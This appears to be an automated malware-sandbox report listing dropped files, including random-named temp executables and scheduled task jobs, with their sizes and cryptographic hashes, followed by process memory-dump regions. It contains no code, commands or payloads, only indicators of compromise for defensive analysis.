                                                                                • C:\Users\Admin\AppData\Local\Temp\mklnsegsd.exe

                                                                                  Filesize

                                                                                  2.4MB

                                                                                  MD5

                                                                                  8e40252356a6fb3f8f52d1effa2c2c3c

                                                                                  SHA1

                                                                                  3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

                                                                                  SHA256

                                                                                  de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

                                                                                  SHA512

                                                                                  c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                  Filesize

                                                                                  7KB

                                                                                  MD5

                                                                                  80a25d7e0afc8a1930b25ba282521696

                                                                                  SHA1

                                                                                  fa5b4eb284451929ecd99e7278742eb00e431736

                                                                                  SHA256

                                                                                  b46b308b56406078e8813d7ba00e7aad3b1e2913e1236b8ead696de260707923

                                                                                  SHA512

                                                                                  7b009a979b328963cb3c3750e4590923df64c2e0e3845fb300a155ccdb6951ff5c962a0789daa9f7c9dc650296ce48361327dd6e3c020b5222d858c98cc45328

                                                                                • C:\Windows\System32\perfc007.dat

                                                                                  Filesize

                                                                                  145KB

                                                                                  MD5

                                                                                  19c7052de3b7281b4c1c6bfbb543c5dc

                                                                                  SHA1

                                                                                  d2e12081a14c1069c89f2cee7357a559c27786e7

                                                                                  SHA256

                                                                                  14ed6cb3198e80964cbc687a60aed24fb68d1bbd7588f983dc1fc6ae63514b4a

                                                                                  SHA512

                                                                                  289ca791909882c857014bd24e777fa84b533896508b562051b529d4c27e0d98bc41c801c6384b382f5dc0fa584dc8f713939c636543b0a5cf5ea2b396300f83

                                                                                • C:\Windows\System32\perfc00A.dat

                                                                                  Filesize

                                                                                  154KB

                                                                                  MD5

                                                                                  f0ecfbfa3e3e59fd02197018f7e9cb84

                                                                                  SHA1

                                                                                  961e9367a4ef3a189466c0a0a186faf8958bdbc4

                                                                                  SHA256

                                                                                  cfa293532a1b865b95093437d82bf8b682132aa335957f0c6d95edfbcc372324

                                                                                  SHA512

                                                                                  116e648cb3b591a6a94da5ef11234778924a2ff9e0b3d7f6f00310d8a58914d12f5ee1b63c2f88701bb00538ad0e42ae2561575333c5a1d63bb8c86863ac6294

                                                                                • C:\Windows\System32\perfc00C.dat

                                                                                  Filesize

                                                                                  145KB

                                                                                  MD5

                                                                                  ce233fa5dc5adcb87a5185617a0ff6ac

                                                                                  SHA1

                                                                                  2e2747284b1204d3ab08733a29fdbabdf8dc55b9

                                                                                  SHA256

                                                                                  68d4de5e72cfd117151c44dd6ec74cf46fafd6c51357895d3025d7dac570ce31

                                                                                  SHA512

                                                                                  1e9c8e7f12d7c87b4faa0d587a8b374e491cd44f23e13fdb64bde3bc6bf3f2a2d3aba5444a13b199a19737a8170ee8d4ead17a883fbaee66b8b32b35b7577fc2

                                                                                • C:\Windows\System32\perfc010.dat

                                                                                  Filesize

                                                                                  142KB

                                                                                  MD5

                                                                                  d73172c6cb697755f87cd047c474cf91

                                                                                  SHA1

                                                                                  abc5c7194abe32885a170ca666b7cce8251ac1d6

                                                                                  SHA256

                                                                                  9de801eebbe32699630f74082c9adea15069acd5afb138c9ecd5d4904e3cdc57

                                                                                  SHA512

                                                                                  7c9e4126bed6bc94a211281eed45cee30452519f125b82b143f78da32a3aac72d94d31757e1da22fb2f8a25099ffddec992e2c60987efb9da9b7a17831eafdf6

                                                                                • C:\Windows\System32\perfc011.dat

                                                                                  Filesize

                                                                                  118KB

                                                                                  MD5

                                                                                  045b3a28859ed815f97e17fcebadf523

                                                                                  SHA1

                                                                                  a3cfaf297b3ef6d2e7ae0e33b9e7a3f212c7c5bd

                                                                                  SHA256

                                                                                  690ebf33940e7d22aeef120d30cc8b1731b2b18ce0cb4b2db89679735809312c

                                                                                  SHA512

                                                                                  d1836a85871c5c11efc407827bb87af4356297a8c498310de45cb322827082622c56cccee7d22c2e2a2f6894a33589534b9f516736005107571d7efade1e9de5

                                                                                • C:\Windows\System32\perfh007.dat

                                                                                  Filesize

                                                                                  680KB

                                                                                  MD5

                                                                                  b69ab3aeddb720d6ef8c05ff88c23b38

                                                                                  SHA1

                                                                                  d830c2155159656ed1806c7c66cae2a54a2441fa

                                                                                  SHA256

                                                                                  24c81302014118e07ed97eaac0819ecf191e0cc3d69c02b16ecda60ac4718625

                                                                                  SHA512

                                                                                  4c7a99d45fb6e90c206439dcdd7cd198870ea5397a6584bb666eed53a8dc36faaac0b9cfc786a3ab4ecbbecc3a4ddd91560246d83b3319f2e37c1ed4bdbec32d

                                                                                • C:\Windows\System32\perfh009.dat

                                                                                  Filesize

                                                                                  646KB

                                                                                  MD5

                                                                                  aecab86cc5c705d7a036cba758c1d7b0

                                                                                  SHA1

                                                                                  e88cf81fd282d91c7fc0efae13c13c55f4857b5e

                                                                                  SHA256

                                                                                  9bab92e274fcc0af88a7fdd143c9045b9d3a13cac2c00b63f00b320128dcc066

                                                                                  SHA512

                                                                                  e0aa8da41373fc64d0e3dc86c9e92a9dd5232f6bcae42dfe6f79012d7e780de85511a9ec6941cb39476632972573a18063d3ecd8b059b1d008d34f585d9edbe8

                                                                                • C:\Windows\System32\perfh00A.dat

                                                                                  Filesize

                                                                                  727KB

                                                                                  MD5

                                                                                  7d0bac4e796872daa3f6dc82c57f4ca8

                                                                                  SHA1

                                                                                  b4f6bbe08fa8cd0784a94ac442ff937a3d3eea0a

                                                                                  SHA256

                                                                                  ce2ef9fc248965f1408d4b7a1e6db67494ba07a7bbdfa810418b30be66ad5879

                                                                                  SHA512

                                                                                  145a0e8543e0d79fe1a5ce268d710c807834a05da1e948f84d6a1818171cd4ef077ea44ba1fe439b07b095721e0109cbf7e4cfd7b57519ee44d9fd9fe1169a3e

                                                                                • C:\Windows\System32\perfh00C.dat

                                                                                  Filesize

                                                                                  727KB

                                                                                  MD5

                                                                                  5f684ce126de17a7d4433ed2494c5ca9

                                                                                  SHA1

                                                                                  ce1a30a477daa1bac2ec358ce58731429eafe911

                                                                                  SHA256

                                                                                  2e2ba0c47e71991d646ec380cde47f44318d695e6f3f56ec095955a129af1c2c

                                                                                  SHA512

                                                                                  4d0c2669b5002da14d44c21dc2f521fb37b6b41b61bca7b2a9af7c03f616dda9ca825f79a81d3401af626a90017654f9221a6ccc83010ff73de71967fc2f3f5b

                                                                                • C:\Windows\System32\perfh010.dat

                                                                                  Filesize

                                                                                  722KB

                                                                                  MD5

                                                                                  4623482c106cf6cc1bac198f31787b65

                                                                                  SHA1

                                                                                  5abb0decf7b42ef5daf7db012a742311932f6dad

                                                                                  SHA256

                                                                                  eceda45aedbf6454b79f010c891bead3844d43189972f6beeb5ccddb13cc0349

                                                                                  SHA512

                                                                                  afecefcec652856dd8b4275f11d75a68a582337b682309c4b61fd26ed7038b92e6b9aa72c1bfc350ce2caf5e357098b54eb1e448a4392960f9f82e01c447669f

                                                                                • C:\Windows\System32\perfh011.dat

                                                                                  Filesize

                                                                                  406KB

                                                                                  MD5

                                                                                  54c674d19c0ff72816402f66f6c3d37c

                                                                                  SHA1

                                                                                  2dcc0269545a213648d59dc84916d9ec2d62a138

                                                                                  SHA256

                                                                                  646d4ea2f0670691aa5b998c26626ede7623886ed3ac9bc9679018f85e584bb5

                                                                                  SHA512

                                                                                  4d451e9bef2c451cb9e86c7f4d705be65787c88df5281da94012bfbe5af496718ec3e48099ec3dff1d06fee7133293f10d649866fe59daa7951aebe2e5e67c1f

                                                                                • C:\Windows\Tasks\dialersvc32.job

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  d2b256f4c97bccbcbd45d763d2010827

                                                                                  SHA1

                                                                                  ed55e6c9e5e0401cb802bd899348fe7a616157d4

                                                                                  SHA256

                                                                                  818fa8f5b76839a9cc037086031f6bf18feda50db6f7397ca804bb7af2947f42

                                                                                  SHA512

                                                                                  2746f44bc6d1ce5d8f205adecbd9b72f59aa9d3135adc4512f81a2cf22a13d166e49a9b1f25fea4cfae5e07f82c83cc6ce3165b296e7a198ccddfc748ab4c909

                                                                                • C:\Windows\Tasks\dialersvc64.job

                                                                                  Filesize

                                                                                  1KB

                                                                                  MD5

                                                                                  1b3760fbd75780d99ebad460d9866774

                                                                                  SHA1

                                                                                  14ad5746ad34ba2ed90466578c2d3788703e1bd8

                                                                                  SHA256

                                                                                  747247fdcad9fa906e30c825552dd81e29d7875156b04a21abc8403c06946965

                                                                                  SHA512

                                                                                  2cdc32b671e245aea1b5c4e8f9171fbba3d4fb41e7b0401e2f4f913f5bfebbe8e15181b5d5c7096749424a8e11f626b7adb4b418b906d6c445692612cda83fa6

                                                                                • \Program Files\Cuis\bon\Bara.exe

                                                                                  Filesize

                                                                                  2.4MB

                                                                                  MD5

                                                                                  b70a5e7260b025e39b8016523a1f2d64

                                                                                  SHA1

                                                                                  aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

                                                                                  SHA256

                                                                                  fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

                                                                                  SHA512

                                                                                  a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

                                                                                • \Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe

                                                                                  Filesize

                                                                                  2.7MB

                                                                                  MD5

                                                                                  952f360a4651f948be3a673178631641

                                                                                  SHA1

                                                                                  60e58b89cfce587aa121baf431d55cbbecd21545

                                                                                  SHA256

                                                                                  a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

                                                                                  SHA512

                                                                                  af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

                                                                                • memory/112-75-0x000000001A030000-0x000000001A312000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB

                                                                                • memory/112-76-0x0000000000A00000-0x0000000000A08000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/112-77-0x00000000016A0000-0x00000000016E0000-memory.dmp

                                                                                  Filesize

                                                                                  256KB

                                                                                • memory/112-79-0x0000000077260000-0x000000007737F000-memory.dmp

                                                                                  Filesize

                                                                                  1.1MB

                                                                                • memory/112-78-0x0000000077480000-0x0000000077629000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/388-37-0x000000013F4D0000-0x000000013F736000-memory.dmp

                                                                                  Filesize

                                                                                  2.4MB

                                                                                • memory/388-55-0x000000013F4D0000-0x000000013F736000-memory.dmp

                                                                                  Filesize

                                                                                  2.4MB

                                                                                • memory/432-87-0x00000000002F0000-0x0000000000313000-memory.dmp

                                                                                  Filesize

                                                                                  140KB

                                                                                • memory/432-89-0x00000000002F0000-0x0000000000313000-memory.dmp

                                                                                  Filesize

                                                                                  140KB

                                                                                • memory/432-98-0x0000000000B20000-0x0000000000B4A000-memory.dmp

                                                                                  Filesize

                                                                                  168KB

                                                                                • memory/432-99-0x000007FEBF500000-0x000007FEBF510000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/432-100-0x00000000374C0000-0x00000000374D0000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/476-113-0x00000000374C0000-0x00000000374D0000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/476-110-0x0000000000200000-0x000000000022A000-memory.dmp

                                                                                  Filesize

                                                                                  168KB

                                                                                • memory/476-112-0x000007FEBF500000-0x000007FEBF510000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/492-117-0x00000000001C0000-0x00000000001EA000-memory.dmp

                                                                                  Filesize

                                                                                  168KB

                                                                                • memory/492-121-0x000007FEBF500000-0x000007FEBF510000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/492-122-0x00000000374C0000-0x00000000374D0000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/752-118-0x000007FEBF500000-0x000007FEBF510000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/752-119-0x00000000374C0000-0x00000000374D0000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/752-116-0x0000000000D40000-0x0000000000D6A000-memory.dmp

                                                                                  Filesize

                                                                                  168KB

                                                                                • memory/812-127-0x0000000000C70000-0x0000000000C9A000-memory.dmp

                                                                                  Filesize

                                                                                  168KB

                                                                                • memory/812-128-0x000007FEBF500000-0x000007FEBF510000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/812-129-0x00000000374C0000-0x00000000374D0000-memory.dmp

                                                                                  Filesize

                                                                                  64KB

                                                                                • memory/1872-80-0x0000000140000000-0x0000000140042000-memory.dmp

                                                                                  Filesize

                                                                                  264KB

                                                                                • memory/1872-82-0x0000000077480000-0x0000000077629000-memory.dmp

                                                                                  Filesize

                                                                                  1.7MB

                                                                                • memory/1872-83-0x0000000077260000-0x000000007737F000-memory.dmp

                                                                                  Filesize

                                                                                  1.1MB

                                                                                • memory/1872-84-0x0000000140000000-0x0000000140042000-memory.dmp

                                                                                  Filesize

                                                                                  264KB

                                                                                • memory/1872-81-0x0000000140000000-0x0000000140042000-memory.dmp

                                                                                  Filesize

                                                                                  264KB

                                                                                • memory/2124-30-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/2124-28-0x000007FEF5FD3000-0x000007FEF5FD4000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/2124-29-0x0000000000230000-0x00000000002B4000-memory.dmp

                                                                                  Filesize

                                                                                  528KB

                                                                                • memory/2124-36-0x000007FEF5FD0000-0x000007FEF69BC000-memory.dmp

                                                                                  Filesize

                                                                                  9.9MB

                                                                                • memory/2164-702-0x0000000000710000-0x0000000000718000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/2164-701-0x000000001A120000-0x000000001A402000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB

                                                                                • memory/2232-42-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB

                                                                                • memory/2232-43-0x0000000001E50000-0x0000000001E58000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/2324-71-0x0000000140000000-0x0000000140056000-memory.dmp

                                                                                  Filesize

                                                                                  344KB

                                                                                • memory/2540-430-0x00000000022F0000-0x00000000022F8000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/2916-35-0x0000000000BB0000-0x0000000000C34000-memory.dmp

                                                                                  Filesize

                                                                                  528KB

                                                                                • memory/3012-51-0x00000000027A0000-0x00000000027A8000-memory.dmp

                                                                                  Filesize

                                                                                  32KB

                                                                                • memory/3012-50-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

                                                                                  Filesize

                                                                                  2.9MB